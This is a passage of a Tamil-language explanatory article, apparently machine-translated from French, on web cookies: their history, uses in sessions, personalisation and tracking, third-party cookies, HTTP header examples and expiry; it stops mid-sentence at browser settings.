இணைய குக்கீ: அது என்ன? வரையறை, தோற்றம், வகைகள் மற்றும் தனியுரிமை

Un குக்கீ அல்லது வலை குக்கீ (அல்லது குக்கீ, சுருக்கமாக சாட்சி கியூபெக்கில்) என்பது HTTP தகவல்தொடர்பு நெறிமுறையால் HTTP சேவையகத்தால் HTTP கிளையண்டிற்கு அனுப்பப்படும் தகவல்களின் வரிசையாக வரையறுக்கப்படுகிறது, சில நிபந்தனைகளின் கீழ் அதே HTTP சேவையகம் வினவப்படும் ஒவ்வொரு முறையும் பிந்தையது திரும்பும்.

குக்கீ என்பது a க்கு சமமானதாகும் டெர்மினலில் சேமிக்கப்பட்ட சிறிய உரை கோப்பு இணைய பயனரின். 20 ஆண்டுகளுக்கும் மேலாக உள்ளது, இணையதள உருவாக்குநர்கள் தங்கள் வழிசெலுத்தலை எளிதாக்குவதற்கும் சில செயல்பாடுகளை அனுமதிப்பதற்கும் பயனர் தரவைச் சேமிக்க அனுமதிக்கின்றனர். குக்கீகள் எப்போதுமே அதிகமாகவோ அல்லது குறைவாகவோ சர்ச்சைக்குரியதாகவே இருக்கின்றன, ஏனெனில் அவை மூன்றாம் தரப்பினரால் பயன்படுத்தக்கூடிய எஞ்சிய தனிப்பட்ட தகவல்களைக் கொண்டிருக்கின்றன.

இது ஒரு HTTP ஹெடராக வலை சேவையகத்தால் இணைய உலாவிக்கு அனுப்பப்படுகிறது, இது ஒவ்வொரு முறையும் அது சர்வரை அணுகும் போது மாறாமல் திரும்பும். ஒரு குக்கீ பயன்படுத்தப்படலாம் ஒரு அங்கீகாரம், ஒரு அமர்வு (மாநில பராமரிப்பு), மற்றும் பயனர் பற்றிய குறிப்பிட்ட தகவலை சேமிக்கவும், தள விருப்பத்தேர்வுகள் அல்லது மின்னணு வணிக வண்டியின் உள்ளடக்கங்கள் போன்றவை. குக்கீ என்ற சொல் உருவானது மந்திர குக்கீ, UNIX கம்ப்யூட்டிங்கில் நன்கு அறியப்பட்ட கருத்து, இது உலாவி குக்கீகளின் யோசனை மற்றும் பெயரை ஊக்கப்படுத்தியது. குக்கீகளுக்கு சில மாற்றுகள் உள்ளன, ஒவ்வொன்றும் அதன் சொந்த பயன்கள், நன்மைகள் மற்றும் தீமைகள் உள்ளன.

எளிய உரை கோப்புகளாக இருப்பதால், குக்கீகள் இயங்காது. அவர்கள் இல்லை ஸ்பைவேர் அல்லது வைரஸ்கள் இல்லை, சில தளங்களில் இருந்து குக்கீகள் பல வைரஸ் எதிர்ப்பு மென்பொருட்களால் கண்டறியப்பட்டாலும், பயனர்கள் பல தளங்களைப் பார்வையிடும்போது அவர்கள் கண்காணிக்க அனுமதிக்கிறார்கள். 

பெரும்பாலான நவீன உலாவிகள் பயனர்களை அனுமதிக்கின்றன குக்கீகளை ஏற்பதா அல்லது நிராகரிப்பதா என்பதை முடிவு செய்யுங்கள். பயனர்களும் செய்யலாம் குக்கீகள் எவ்வளவு நேரம் சேமிக்கப்படும் என்பதை தேர்வு செய்யவும். இருப்பினும், குக்கீகளை முழுமையாக நிராகரிப்பது சில தளங்களைப் பயன்படுத்த முடியாததாக ஆக்குகிறது. எடுத்துக்காட்டாக, சான்றுகளை (பயனர்பெயர் மற்றும் கடவுச்சொல்) பயன்படுத்தி உள்நுழைய வேண்டிய வணிக வண்டிகள் அல்லது தளங்களைச் சேமிக்கவும்.

Historique

கால குக்கீ ஆங்கில வார்த்தையிலிருந்து வந்தது மந்திர குக்கீ, இது ஒரு நிரல் பெறும் மற்றும் மாறாமல் திரும்பும் தரவுகளின் பாக்கெட் ஆகும். குக்கீகள் ஏற்கனவே ஐடியில் பயன்படுத்தப்பட்டது லூ மாண்டுல்லி இணையத் தொடர்புகளில் அவற்றைப் பயன்படுத்த யோசனை இருந்தது ஜூன் 1994 இல். அந்த நேரத்தில், அவர் நெட்ஸ்கேப் கம்யூனிகேஷன்ஸ் நிறுவனத்தில் பணிபுரிந்தார், இது ஒரு வாடிக்கையாளருக்கான இ-காமர்ஸ் பயன்பாட்டை உருவாக்கியது. ஒரு கடையின் மெய்நிகர் ஷாப்பிங் கார்ட் செயல்படுத்தலின் நம்பகத்தன்மையின் சிக்கலுக்கு குக்கீகள் ஒரு தீர்வைக் கொடுத்தன.

ஜான் ஜியானண்ட்ரியா மற்றும் லூ மான்டுல்லி ஆகியோர் அதே ஆண்டில் நெட்ஸ்கேப்பின் முதல் குக்கீ விவரக்குறிப்பை எழுதினார்கள். மொசைக் நெட்ஸ்கேப்பின் பதிப்பு 0.9 பீட்டா, அக்டோபர் 13, 1994 இல் வெளியிடப்பட்டது, ஒருங்கிணைக்கப்பட்டது குக்கீ தொழில்நுட்பம் (இடுகையைப் பார்க்கவும்) குக்கீகளின் முதல் (பரிசோதனை அல்லாத) பயன்பாடானது, நெட்ஸ்கேப் இணையதளத்திற்கு வருபவர்கள் இதற்கு முன் அந்த தளத்தைப் பார்வையிட்டார்களா என்பதைத் தீர்மானிப்பதாகும். Montulli 1995 இல் குக்கீ தொழில்நுட்பத்திற்கான காப்புரிமை விண்ணப்பத்தை தாக்கல் செய்தார், மேலும் US காப்புரிமை 5774670 வழங்கப்பட்டது. 1998 இல் வழங்கப்பட்டது.

0.9 இல் நெட்ஸ்கேப் 1994 பீட்டாவில் செயல்படுத்தப்பட்ட பிறகு, குக்கீகள் அக்டோபர் 2 இல் வெளியிடப்பட்ட இன்டர்நெட் எக்ஸ்ப்ளோரர் 1995 இல் ஒருங்கிணைக்கப்பட்டன.

குக்கீகளின் அறிமுகம் பொதுமக்களுக்கு இன்னும் பரவலாக அறியப்படவில்லை. குறிப்பாக, உலாவி அமைப்புகளில் குக்கீகள் இயல்புநிலையாக ஏற்றுக்கொள்ளப்பட்டன, மேலும் பயனர்கள் தங்கள் இருப்பு குறித்து தெரிவிக்கப்படவில்லை. 1995 ஆம் ஆண்டின் முதல் காலாண்டில் குக்கீகள் இருப்பதைப் பற்றி சிலர் அறிந்திருந்தனர், ஆனால் ஃபைனான்சியல் டைம்ஸ் பிப்ரவரி 12, 1996 அன்று ஒரு கட்டுரையை வெளியிட்ட பிறகுதான் பொது மக்கள் தங்கள் இருப்பை எடுத்துக் கொண்டனர். அதே ஆண்டில், குக்கீகள் நிறைய ஊடக கவனத்தைப் பெற்றன. ஏனெனில் சாத்தியமான தனியுரிமை ஊடுருவல்கள். குக்கீகளின் பொருள் 1996 மற்றும் 1997 இல் அமெரிக்க பெடரல் டிரேட் கமிஷனின் இரண்டு ஆலோசனைகளில் விவாதிக்கப்பட்டது.

அதிகாரப்பூர்வ குக்கீ விவரக்குறிப்பின் மேம்பாடு ஏற்கனவே நடந்து கொண்டிருந்தது. அதிகாரப்பூர்வ விவரக்குறிப்பின் முதல் விவாதம் ஏப்ரல் 1995 இல் www-talk அஞ்சல் பட்டியலில் நடைபெற்றது. ஒரு சிறப்பு IETF பணிக்குழு உருவாக்கப்பட்டது. HTTP பரிவர்த்தனைகளுக்கு மாநிலத்தை அறிமுகப்படுத்துவதற்கான இரண்டு மாற்று முன்மொழிவுகள் முறையே பிரையன் பெஹ்லெண்டோர்ஃப் மற்றும் டேவிட் கிறிஸ்டல் ஆகியோரால் முன்மொழியப்பட்டது, ஆனால் கிறிஸ்டோலின் தலைமையிலான குழு, நெட்ஸ்கேப்பின் விவரக்குறிப்பை ஒரு தொடக்க புள்ளியாகப் பயன்படுத்த முடிவு செய்தது. பிப்ரவரி 1996 இல், மூன்றாம் தரப்பு குக்கீகள் தனியுரிமைக்கு குறிப்பிடத்தக்க அச்சுறுத்தலாக இருப்பதாக பணிக்குழு தீர்மானித்தது. குழுவால் தயாரிக்கப்பட்ட விவரக்குறிப்பு இறுதியில் வெளியிடப்பட்டது RFC 2109.

2014 ஆம் ஆண்டின் இறுதியில் இருந்து, பல தளங்களில் குக்கீகள் பற்றிய பேனரைப் பார்க்கிறோம். அனுமதிக்கும் குறைந்தபட்சம் ஒரு உலாவி நீட்டிப்பு உள்ளது பேனர் காட்டப்படவில்லை.

குக்கீகளின் வகைகள் மற்றும் பயன்பாடுகள்

அமர்வு மேலாண்மை

வழிசெலுத்தலின் போது பயனர் தரவை பராமரிக்க குக்கீகள் பயன்படுத்தப்படலாம், ஆனால் பல வருகைகள் முழுவதும். மின்னணு ஷாப்பிங் கார்ட்களை செயல்படுத்துவதற்கான வழிமுறையை வழங்க குக்கீகள் அறிமுகப்படுத்தப்பட்டன, இது ஒரு மெய்நிகர் சாதனமாகும், இதில் பயனர் தளத்தை உலாவும்போது வாங்க விரும்பும் பொருட்களைக் குவிக்க முடியும்.

இந்த நாட்களில், ஷாப்பிங் கார்ட்கள் போன்ற பயன்பாடுகள், சேவையகத்தில் உள்ள தரவுத்தளத்தில் உருப்படிகளின் பட்டியலைச் சேமித்து வைக்கின்றன, இது விரும்பத்தக்கது; அவற்றை குக்கீயில் சேமிப்பதை விட. இணைய சேவையகம் ஒரு தனிப்பட்ட அமர்வு ஐடி கொண்ட குக்கீயை அனுப்புகிறது. இணைய உலாவி ஒவ்வொரு அடுத்தடுத்த கோரிக்கையிலும் இந்த அமர்வு ஐடியைத் திருப்பித் தருகிறது, மேலும் கூடையில் உள்ள உருப்படிகள் சேமிக்கப்பட்டு, இதே தனித்துவமான அமர்வு ஐடியுடன் இணைக்கப்படும்.

நற்சான்றிதழ்களைப் பயன்படுத்தி ஒரு தளத்தில் உள்நுழைவதற்கு குக்கீகளை அடிக்கடி பயன்படுத்துவது பயனுள்ளதாக இருக்கும். சுருக்கமாக, இணைய சேவையகம் முதலில் ஒரு தனிப்பட்ட அமர்வு ஐடியைக் கொண்ட குக்கீயை அனுப்புகிறது. பின்னர் பயனர்கள் தங்கள் நற்சான்றிதழ்களை வழங்குகிறார்கள் (பொதுவாக ஒரு பயனர்பெயர் மற்றும் கடவுச்சொல்). வலை பயன்பாடு பின்னர் அமர்வை அங்கீகரித்து, சேவையை அணுக பயனரை அனுமதிக்கிறது.

தனிப்பயனாக்குதலுக்காக

எதிர்காலத்தில் பொருத்தமான உள்ளடக்கத்தைக் காண்பிப்பதற்காக, ஒரு தளத்தின் பயனரைப் பற்றிய தகவலை நினைவில் வைத்துக் கொள்ள குக்கீகளைப் பயன்படுத்தலாம். எடுத்துக்காட்டாக, ஒரு இணைய சேவையகம் அந்த இணையதளத்தில் உள்நுழைய கடைசியாகப் பயன்படுத்தப்பட்ட பயனர்பெயரைக் கொண்ட குக்கீயை அனுப்பலாம், இதனால் பயனர்பெயர் எதிர்கால வருகைகளில் முன் நிரப்பப்படும்.

பல இணையதளங்கள் பயனர் விருப்பங்களின் அடிப்படையில் தனிப்பயனாக்க குக்கீகளைப் பயன்படுத்துகின்றன. பயனர்கள் தங்களின் விருப்பங்களை ஒரு படிவத்தில் தேர்ந்தெடுத்து சர்வரில் சமர்ப்பிக்கவும். சேவையகம் ஒரு குக்கீயில் விருப்பத்தேர்வுகளை குறியாக்கம் செய்து மீண்டும் உலாவிக்கு அனுப்புகிறது. பின்னர், ஒவ்வொரு முறையும் பயனர் இந்தத் தளத்தின் பக்கத்தை அணுகும்போது, ​​உலாவி குக்கீயை வழங்குகிறது, எனவே விருப்பங்களின் பட்டியல்; சேவையகம் பயனரின் விருப்பங்களுக்கு ஏற்ப பக்கத்தைத் தனிப்பயனாக்கலாம். எடுத்துக்காட்டாக, விக்கிபீடியா இணையதளம் அதன் பயனர்கள் தாங்கள் விரும்பும் தளத்தின் தோலைத் தேர்ந்தெடுக்க அனுமதிக்கிறது. கூகுள் தேடுபொறி அதன் பயனர்களை (அவர்கள் பதிவு செய்யாவிட்டாலும் கூட) ஒவ்வொரு முடிவுப் பக்கத்திலும் பார்க்க விரும்பும் முடிவுகளின் எண்ணிக்கையைத் தேர்வுசெய்ய அனுமதிக்கிறது.

கண்காணிப்பு

இணைய பயனர்களின் உலாவல் பழக்கங்களைக் கண்காணிக்க கண்காணிப்பு குக்கீகள் பயன்படுத்தப்படுகின்றன. கணினியின் ஐபி முகவரியைப் பயன்படுத்தி ஒரு பக்கத்திற்கான கோரிக்கையை வைப்பதன் மூலமோ அல்லது கிளையன்ட் ஒவ்வொரு கோரிக்கையிலும் அனுப்பும் 'பரிந்துரையாளர்' HTTP தலைப்பைப் பயன்படுத்துவதன் மூலமோ இது ஓரளவு செய்யப்படலாம், ஆனால் குக்கீகள் அதிக துல்லியத்தை அனுமதிக்கின்றன. பின்வரும் எடுத்துக்காட்டில் உள்ளதைப் போல இதைச் செய்யலாம்:

1. பயனர் ஒரு தளத்தில் ஒரு பக்கத்தை அழைத்தால், கோரிக்கையில் குக்கீ இல்லை என்றால், இது பயனர் பார்வையிட்ட முதல் பக்கம் என்று சர்வர் கருதுகிறது. சர்வர் ஒரு சீரற்ற சரத்தை உருவாக்கி, கோரப்பட்ட பக்கத்துடன் உலாவிக்கு அனுப்புகிறது.
2. இந்த தருணத்திலிருந்து, ஒவ்வொரு முறையும் தளத்தின் புதிய பக்கம் அழைக்கப்படும்போது குக்கீ தானாகவே உலாவியால் அனுப்பப்படும். சேவையகம் வழக்கம் போல் பக்கத்தை அனுப்பும், ஆனால் ஒரு பதிவு கோப்பில் அழைக்கப்படும் பக்கத்தின் URL, கோரிக்கையின் தேதி, நேரம் மற்றும் குக்கீ ஆகியவற்றையும் பதிவு செய்யும்.

பதிவுக் கோப்பைப் பார்ப்பதன் மூலம், பயனர் எந்தப் பக்கங்களைப் பார்வையிட்டார், எந்த வரிசையில் இருக்கிறார் என்பதைப் பார்க்க முடியும். எடுத்துக்காட்டாக, id=abc குக்கீயைப் பயன்படுத்தி கோப்பில் சில கோரிக்கைகள் இருந்தால், இந்தக் கோரிக்கைகள் அனைத்தும் ஒரே பயனரிடமிருந்து வந்தவை என்பதை இது நிறுவலாம். கோரப்பட்ட URL, கோரிக்கைகளுடன் தொடர்புடைய தேதி மற்றும் நேரம் ஆகியவை பயனரின் உலாவலைக் கண்காணிக்க அனுமதிக்கின்றன.

மூன்றாம் தரப்பு குக்கீகள் மற்றும் வெப் பீக்கான்கள், கீழே விளக்கப்பட்டுள்ளது, கூடுதலாக வெவ்வேறு தளங்களில் கண்காணிப்பதை இயக்கும். ஒற்றை தள கண்காணிப்பு பொதுவாக புள்ளிவிவர நோக்கங்களுக்காக பயன்படுத்தப்படுகிறது. இதற்கு நேர்மாறாக, மூன்றாம் தரப்பு குக்கீகளைப் பயன்படுத்தி வெவ்வேறு தளங்களில் கண்காணிப்பது பொதுவாக விளம்பர நிறுவனங்களால் அநாமதேய பயனர் சுயவிவரங்களை உருவாக்கப் பயன்படுத்தப்படுகிறது (பின்னர் எந்த விளம்பரங்கள் பயனருக்குக் காட்டப்பட வேண்டும் என்பதைத் தீர்மானிக்கவும், இந்த விளம்பரங்களுடன் தொடர்புடைய மின்னஞ்சல்களை அவருக்கு அனுப்பவும் பயன்படுகிறது - SPAM. )

கண்காணிப்பு குக்கீகள் பயனர் தனியுரிமையை ஆக்கிரமிக்கும் அபாயம், ஆனால் அவை எளிதாக நீக்கப்படும். பெரும்பாலான நவீன உலாவிகளில், பயன்பாட்டை மூடும் போது, ​​நிலையான குக்கீகளை தானாக நீக்குவதற்கான விருப்பமும் உள்ளது.

மூன்றாம் தரப்பு குக்கீகள்

வலைப்பக்கத்தில் உள்ள படங்கள் மற்றும் பிற பொருள்கள் பக்கத்தை ஹோஸ்ட் செய்யும் சேவையகங்களில் இருந்து வேறுபட்டதாக இருக்கலாம். பக்கத்தைக் காண்பிக்க, உலாவி இந்த எல்லா பொருட்களையும் பதிவிறக்குகிறது. பெரும்பாலான இணையதளங்கள் வெவ்வேறு மூலங்களிலிருந்து தகவல்களைக் கொண்டிருக்கின்றன. எடுத்துக்காட்டாக, www.example.com என உங்கள் உலாவியில் தட்டச்சு செய்தால், பக்கத்தின் ஒரு பகுதியில் பல்வேறு மூலங்களிலிருந்து, அதாவது www. .example.com ஐ விட வேறு டொமைனில் இருந்து வரும் பொருள்கள் அல்லது விளம்பரங்கள் அடிக்கடி இருக்கும். "முதல்" குக்கீகள் என்பது உலாவியின் முகவரிப் பட்டியில் பட்டியலிடப்பட்டுள்ள டொமைன் மூலம் அமைக்கப்படும் குக்கீகள் ஆகும். மூன்றாம் தரப்பு குக்கீகள் வேறொரு டொமைனில் இருந்து வரும் பக்கம் பொருள்களில் ஒன்றின் மூலம் அமைக்கப்படுகின்றன.

இயல்பாக, Mozilla Firefox, Microsoft Internet Explorer மற்றும் Opera போன்ற உலாவிகள் மூன்றாம் தரப்பு குக்கீகளை ஏற்றுக்கொள்கின்றன, ஆனால் பயனர்கள் அவற்றைத் தடுக்க உலாவி விருப்பங்களில் உள்ள அமைப்புகளை மாற்றலாம். இணைய செயல்பாட்டை செயல்படுத்தும் மூன்றாம் தரப்பு குக்கீகளில் உள்ளார்ந்த பாதுகாப்பு ஆபத்து எதுவும் இல்லை, இருப்பினும் அவை பயனர்களைக் கண்காணிக்கவும் பயன்படுத்தப்படுகின்றன. தளத்திலிருந்து தளத்திற்கு.

கூகுள் குரோம் உட்பட அனைத்து உலாவிகளுக்கும் கிடைக்கும் Ghostery போன்ற கருவிகள் மூன்றாம் தரப்பினரிடையே பரிமாற்றங்களைத் தடுக்கலாம்.

செயல்படுத்தல்

குக்கீகள் என்பது இணைய சேவையகத்தால் உலாவிக்கு அனுப்பப்படும் சிறிய தரவுகளாகும். உலாவி அவற்றை மாறாமல் சேவையகத்திற்குத் திருப்பி, நிலையற்ற HTTP பரிவர்த்தனையில் நிலையை (கடந்த கால நிகழ்வுகளின் நினைவகம்) அறிமுகப்படுத்துகிறது. குக்கீகள் இல்லாமல், ஒரு இணையப் பக்கம் அல்லது வலைப்பக்கத்தின் கூறுகளை மீட்டெடுப்பது ஒரு தனிமைப்படுத்தப்பட்ட நிகழ்வாகும், அதே தளத்தில் செய்யப்படும் பிற கோரிக்கைகளிலிருந்து சுயாதீனமாக இருக்கும். இணைய சேவையகத்தால் அமைக்கப்படுவதைத் தவிர, உலாவியால் ஆதரிக்கப்பட்டு அங்கீகரிக்கப்பட்டால், ஜாவாஸ்கிரிப்ட் போன்ற ஸ்கிரிப்டிங் மொழிகளாலும் குக்கீகளை அமைக்கலாம்.

உத்தியோகபூர்வ குக்கீ விவரக்குறிப்பு உலாவிகள் குறைந்தபட்ச எண்ணிக்கையிலான குக்கீகளை சேமிக்கவும் மீண்டும் அனுப்பவும் முடியும் என்று பரிந்துரைக்கிறது. குறிப்பாக, ஒரு உலாவியானது ஒவ்வொன்றும் நான்கு கிலோபைட்டுகள் கொண்ட குறைந்தது 300 குக்கீகளையும், ஒரு சேவையகம் அல்லது டொமைனுக்கு குறைந்தது 20 குக்கீகளையும் சேமிக்க முடியும்.

பிரிவு 3.1 இன் படி RFC 2965, குக்கீ பெயர்கள் கேஸ் இன்சென்சிட்டிவ்.

ஒரு குக்கீ அதன் காலாவதி தேதியைக் குறிப்பிடலாம், இந்த தேதியில் குக்கீ நீக்கப்படும். குக்கீ காலாவதி தேதியைக் குறிப்பிடவில்லை என்றால், பயனர் தனது உலாவியை விட்டு வெளியேறியவுடன் குக்கீ நீக்கப்படும். எனவே, காலாவதி தேதியைக் குறிப்பிடுவது குக்கீயை பல அமர்வுகள் மூலம் உயிர்வாழச் செய்வதற்கான ஒரு வழியாகும். இந்த காரணத்திற்காக, காலாவதி தேதி கொண்ட குக்கீகள் கூறப்படுகிறது தொடர்ந்து. ஒரு எடுத்துக்காட்டு பயன்பாடு: பயனர்கள் தங்கள் ஷாப்பிங் கார்ட்டில் வைத்திருக்கும் பொருட்களைப் பதிவு செய்ய சில்லறை விற்பனைத் தளம் நிலையான குக்கீகளைப் பயன்படுத்தலாம் (உண்மையில், குக்கீ என்பது உங்கள் கணினியில் அல்லாமல், விற்பனை தளத்தில் உள்ள தரவுத்தளத்தில் சேமிக்கப்பட்ட உள்ளீட்டைக் குறிக்கலாம்) . இதன் மூலம், பயனர்கள் தங்கள் உலாவியை வாங்காமல் விட்டுவிட்டு, பின்னர் அதற்குத் திரும்பினால், அவர்கள் கார்ட்டில் உள்ள பொருட்களை மீண்டும் கண்டுபிடிக்க முடியும். இந்த குக்கீகள் காலாவதி தேதியை வழங்கவில்லை என்றால், உலாவி மூடப்பட்டவுடன் அவை காலாவதியாகிவிடும், மேலும் கூடையின் உள்ளடக்கங்கள் பற்றிய தகவல்கள் இழக்கப்படும்.

குக்கீகளை ஒரு குறிப்பிட்ட டொமைன், துணை டொமைன் அல்லது அவற்றை உருவாக்கிய சர்வரில் உள்ள பாதைக்கு வரம்பிடலாம்.

ஒரு குக்கீ உருவாக்கம்

இணையப் பக்கங்களின் பரிமாற்றம் ஹைப்பர்டெக்ஸ்ட் டிரான்ஸ்ஃபர் புரோட்டோகால் (HTTP) ஐப் பயன்படுத்தி செய்யப்படுகிறது. குக்கீகளைப் புறக்கணிப்பதன் மூலம், உலாவிகள் வலை சேவையகங்களிலிருந்து ஒரு பக்கத்தை அழைக்கின்றன HTTP கோரிக்கை. எடுத்துக்காட்டாக, www.example.org/index.html பக்கத்தை அணுக, உலாவிகள் www.example.org சேவையகத்துடன் இணைக்கப்பட்டு, இது போன்ற கோரிக்கையை அனுப்பவும்:

	GET /index.html HTTP/1.1Host: www.example.org
மாலுமி	→	சர்வர்

கோரப்பட்ட பக்கத்தை அனுப்புவதன் மூலம் சேவையகம் பதிலளிக்கிறது, அதற்கு முன் இதே போன்ற உரை, முழுவதுமாக அழைக்கப்படும் HTTP பதில். இந்த பாக்கெட்டில் குக்கீகளை சேமிக்க உலாவிக்கு அறிவுறுத்தும் வரிகள் இருக்கலாம்:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML பக்கம்)
மாலுமி	←	சர்வர்

உலாவி குக்கீயைச் சேமிக்க வேண்டுமெனில், சேவையகம் செட்-குக்கீ வரியை மட்டுமே அனுப்புகிறது. Set-Cookie என்பது உலாவியின் பெயர்=மதிப்பு சரத்தை சேமித்து அனைத்து எதிர்கால கோரிக்கைகளிலும் சேவையகத்திற்கு திருப்பி அனுப்புவதற்கான கோரிக்கையாகும். உலாவி குக்கீகளை ஆதரிக்கிறது மற்றும் உலாவி விருப்பங்களில் குக்கீகள் இயக்கப்பட்டிருந்தால், அதே சர்வரில் செய்யப்படும் அனைத்து அடுத்தடுத்த கோரிக்கைகளிலும் குக்கீ சேர்க்கப்படும். எடுத்துக்காட்டாக, உலாவி www.example.org/news.html பக்கத்தை பின்வரும் கோரிக்கையை www.example.org சேவையகத்திற்கு அனுப்புகிறது:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
மாலுமி	→	சர்வர்

இது அதே சர்வரில் இருந்து மற்றொரு பக்கத்திற்கான கோரிக்கையாகும், மேலும் மேலே உள்ள முதல் பக்கத்திலிருந்து வேறுபட்டது, ஏனெனில் சர்வர் முன்பு உலாவிக்கு அனுப்பிய சரம் இதில் உள்ளது. இதற்கு நன்றி, இந்த கோரிக்கை முந்தைய கோரிக்கையுடன் இணைக்கப்பட்டுள்ளது என்பதை சேவையகத்திற்குத் தெரியும். அழைக்கப்பட்ட பக்கத்தை அனுப்புவதன் மூலமும், அதில் பிற குக்கீகளைச் சேர்ப்பதன் மூலமும் சேவையகம் பதிலளிக்கிறது.

ஒரு புதிய வரி Set-Cookie: name=new_value என அழைக்கப்படும் பக்கத்திற்கு பதில் அனுப்புவதன் மூலம் குக்கீயின் மதிப்பை சேவையகத்தால் மாற்றலாம். உலாவி பழைய மதிப்பை புதியதாக மாற்றுகிறது.

செட்-குக்கீ வரி பொதுவாக ஒரு CGI நிரல் அல்லது பிற ஸ்கிரிப்டிங் மொழியால் உருவாக்கப்படுகிறது, HTTP சேவையகத்தால் அல்ல. HTTP சேவையகம் (எடுத்துக்காட்டு: Apache) நிரலின் முடிவை மட்டுமே (குக்கீகளைக் கொண்ட தலைப்புக்கு முந்தைய ஆவணம்) உலாவிக்கு அனுப்பும்.

உலாவியில் இயங்கும் ஜாவாஸ்கிரிப்ட் அல்லது பிற ஒத்த மொழிகளால் குக்கீகளை அமைக்கலாம், அதாவது சர்வர் பக்கத்தை விட கிளையன்ட் பக்கத்தில். JavaScript இல், document.cookie ஆப்ஜெக்ட் இந்த நோக்கத்திற்காக பயன்படுத்தப்படுகிறது. எடுத்துக்காட்டாக, document.cookie = "temperature=20" என்ற கூற்று "வெப்பநிலை" மற்றும் 20 மதிப்புடன் குக்கீயை உருவாக்குகிறது.

குக்கீயின் பண்புக்கூறுகள்

பெயர்/மதிப்பு ஜோடிக்கு கூடுதலாக, ஒரு குக்கீயில் காலாவதி தேதி, பாதை, டொமைன் பெயர் மற்றும் இணைக்கப்பட்ட வகை, அதாவது இயல்பான அல்லது குறியாக்கம் ஆகியவையும் இருக்கலாம். RFC 2965 குக்கீகள் கட்டாய பதிப்பு எண்ணைக் கொண்டிருக்க வேண்டும் என்று வரையறுக்கிறது, ஆனால் இது பொதுவாக தவிர்க்கப்படுகிறது. இந்தத் தரவுப் பகுதிகள் பெயர்=new_value ஜோடியைப் பின்பற்றி அரைப்புள்ளிகளால் பிரிக்கப்படுகின்றன. எடுத்துக்காட்டாக, செட்-குக்கீ வரியை அனுப்புவதன் மூலம் சேவையகத்தால் குக்கீயை உருவாக்க முடியும்: name=new_value; காலாவதி=தேதி; பாதை=/; domain=.example.org.

குக்கீயின் காலாவதி

குக்கீகள் காலாவதியாகி, பின்னர் பின்வரும் சூழ்நிலைகளில் சேவையகத்திற்கு உலாவியால் அனுப்பப்படாது:

• உலாவி மூடப்பட்டிருக்கும் போது, ​​குக்கீ நிலையாக இல்லை என்றால்.
• குக்கீ காலாவதி தேதி முடிந்தவுடன்.
• குக்கீ காலாவதி தேதி (சர்வர் அல்லது ஸ்கிரிப்ட் மூலம்) கடந்த தேதிக்கு மாற்றப்படும் போது.
• பயனரின் வேண்டுகோளின் பேரில் உலாவி குக்கீயை நீக்கும் போது.

மூன்றாவது சூழ்நிலையானது குக்கீயை வெளிப்படையாக நீக்க சர்வர்கள் அல்லது ஸ்கிரிப்ட்களை அனுமதிக்கிறது. உள்ளடக்க அமைப்புகளை அணுகுவதன் மூலம் குறிப்பிட்ட குக்கீயின் காலாவதி தேதியை அறிந்து கொள்வது Google Chrome இணைய உலாவியில் சாத்தியமாகும் என்பதை நினைவில் கொள்ளவும். கணினியில் சேமிக்கப்பட்ட ஒரு குக்கீ, அதை அழிக்க எந்த நடைமுறையும் எடுக்கப்படாவிட்டால், பல தசாப்தங்களாக அங்கேயே இருக்கும்.

ஸ்டீரியோடைப்கள்

இணையத்தில் அவர்கள் அறிமுகப்படுத்தியதிலிருந்து, குக்கீகள் பற்றிய பல கருத்துக்கள் இணையத்திலும் ஊடகங்களிலும் பரவி வருகின்றன. 1998 ஆம் ஆண்டில், அமெரிக்காவின் எரிசக்தி துறையின் கணினி சம்பவ கண்காணிப்புக் குழுவான CIAC, குக்கீ பாதுகாப்பு பாதிப்புகள் "அடிப்படையில் இல்லை" என்று தீர்மானித்து, "உங்கள் வருகைகளின் தோற்றம் மற்றும் நீங்கள் பார்வையிட்ட இணையப் பக்கங்களின் விவரங்கள் பற்றிய தகவல்கள்" என்று விளக்கினார். இணைய சேவையகங்களின் பதிவு கோப்புகளில் ஏற்கனவே உள்ளது. 2005 ஆம் ஆண்டில், வியாழன் ஆராய்ச்சி ஒரு ஆய்வின் முடிவுகளை வெளியிட்டது, அதில் பதிலளித்தவர்களில் கணிசமான சதவீதம் பேர் பின்வரும் அறிக்கைகளைக் கருத்தில் கொண்டனர்:

• குக்கீகள் போன்றவை வைரஸ், அவை பயனர்களின் ஹார்டு டிரைவ்களை பாதிக்கின்றன.
• குக்கீகள் உருவாக்குகின்றன பாப் அப்.
• அனுப்ப குக்கீகள் பயன்படுத்தப்படுகின்றன ஸ்பேம்.
• குக்கீகள் விளம்பரத்திற்காக மட்டுமே பயன்படுத்தப்படுகின்றன.

குக்கீகளால் பயனரின் கணினியில் உள்ள தகவல்களை அழிக்கவோ படிக்கவோ முடியாது. இருப்பினும், கொடுக்கப்பட்ட தளம் அல்லது தளங்களின் தொகுப்பில் பயனர் பார்வையிட்ட இணையப் பக்கங்களைக் கண்டறிவதை குக்கீகள் சாத்தியமாக்குகின்றன. இந்தத் தகவலைப் பயன்படுத்தக்கூடிய அல்லது மூன்றாம் தரப்பினருக்கு மறுவிற்பனை செய்யக்கூடிய பயனர் சுயவிவரத்தில் சேகரிக்கலாம், இது தீவிர தனியுரிமைச் சிக்கல்களை ஏற்படுத்தலாம். சில சுயவிவரங்கள் அநாமதேயமானவை, அவை தனிப்பட்ட தகவல்களைக் கொண்டிருக்கவில்லை, ஆனால் அத்தகைய சுயவிவரங்கள் கூட சந்தேகத்திற்குரியதாக இருக்கலாம்.

அதே ஆய்வின்படி, இணைய பயனர்களில் பெரும் சதவீதத்தினர் குக்கீகளை எவ்வாறு நீக்குவது என்று தெரியவில்லை. குக்கீகளை மக்கள் நம்பாததற்கு ஒரு காரணம், சில தளங்கள் குக்கீகளை தனிப்பட்ட முறையில் அடையாளம் காணும் அம்சத்தை துஷ்பிரயோகம் செய்து மற்ற ஆதாரங்களுடன் இந்தத் தகவலைப் பகிர்ந்துள்ளது. ஸ்பேம் எனக் கருதப்படும் இலக்கு விளம்பரம் மற்றும் கோரப்படாத மின்னஞ்சலின் பெரும்பகுதி குக்கீகளைக் கண்காணிப்பதில் இருந்து பெறப்பட்ட தகவலிலிருந்து வருகிறது.

உலாவி அமைப்புகள்

பெரும்பாலான உலாவிகள் குக்கீகளை ஆதரிக்கின்றன மற்றும் பயனர் அவற்றை முடக்க அனுமதிக்கின்றன. மிகவும் பொதுவான விருப்பங்கள்:

